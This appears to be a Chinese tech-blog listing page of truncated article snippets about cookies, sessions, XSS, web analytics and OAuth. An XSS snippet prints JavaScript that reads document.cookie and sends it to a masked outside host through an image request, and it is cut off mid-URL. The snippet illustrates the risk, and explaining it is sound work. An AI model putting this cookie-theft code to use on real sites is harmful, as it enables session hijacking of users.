不想做黑客的安全测试不是优秀的cybercop。怎么才能算是优秀的cybercop呢?那么就就必须学会或懂的黑客惯用一些手法与业内所流行的一些漏洞。加QQ群:1366117821、常见的几种攻击手段CC攻击XSS攻击CSRF攻击SQL注入攻击TCP全连接攻击框架重定向攻击惯性思维逻辑攻击WEB
Se...
分类:
其他好文 时间:
2014-05-26 21:03:10
阅读次数:
361
1、设置CookiePHP用SetCookie函数来设置Cookie。必须注意的一点是:Cookie是HTTP协议头的一部分,用于浏览器和服务器之间传递信息,所以必须在任何属于HTML文件本身的内容输出之前调用Cookie函数。SetCookie函数定义了一个Cookie,并且把它附加在HTTP头的...
分类:
Web程序 时间:
2014-05-23 06:05:16
阅读次数:
244
一,Session:含义:有始有终的一系列动作\消息1,隐含了“面向连接”和“保持状态”两种含义2,一种用来在客户端与服务器之间保持状态的解决方案3,也指这种解决方案的存储结构“把××保存在session里”二,http协议本来是无状态的,所以引进了cookie和session机制来保持连接状态co...
分类:
Web程序 时间:
2014-05-23 06:00:13
阅读次数:
326
xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
相信网站站长们在每天查看百度统计数据时会发现网站的IP和UV数据时大时小,有时候IP比UV大,有时候UV比IP大,站长们可能对这些情况感到奇怪。今天就和大家分享一下UV和IP的知识,帮助大家更好地做好网站流量分析工作。
一、Cookie、UV和IP的概念 要区别UV和IP,就要先说到Cook...
分类:
其他好文 时间:
2014-05-22 06:19:16
阅读次数:
444
javascript当中的cookie机制,使应用达到了真正的全局变量的要求,cookie是浏览器提供的一种机制,它将document
对象的cookie属性提供给JavaScript。可以由JavaScript对其进行控制,而并不是JavaScript本身的性质,由于cookie机制是把信息储存到...
分类:
Web程序 时间:
2014-05-22 05:53:29
阅读次数:
303
1、下载python3.3安装包#wget wget --no-cookie
--no-check-certificate --header "Cookie:gpw_e24=http%3A%2F%2Fwww.oracle.com%2F"
http://www.python.org/ftp/pytho...
分类:
编程语言 时间:
2014-05-21 17:23:59
阅读次数:
391
通过Cookie实现"记住我"的功能
1.登陆页面如下:
每个字段对应的属性name如下表:
用户帐号
name
登陆密码
password
验证码
checkNum
记住我
rememberMe
2.Action中的处理如下:
在用户第一次登陆后,进行Cookie进行处理
登陆处理:
/**登陆*/
...
分类:
其他好文 时间:
2014-05-21 16:41:08
阅读次数:
223
OAuth 漏洞预警 (OAuth平台redirect_uri 漏洞), 说说如何修补...
分类:
其他好文 时间:
2014-05-21 14:37:04
阅读次数:
262
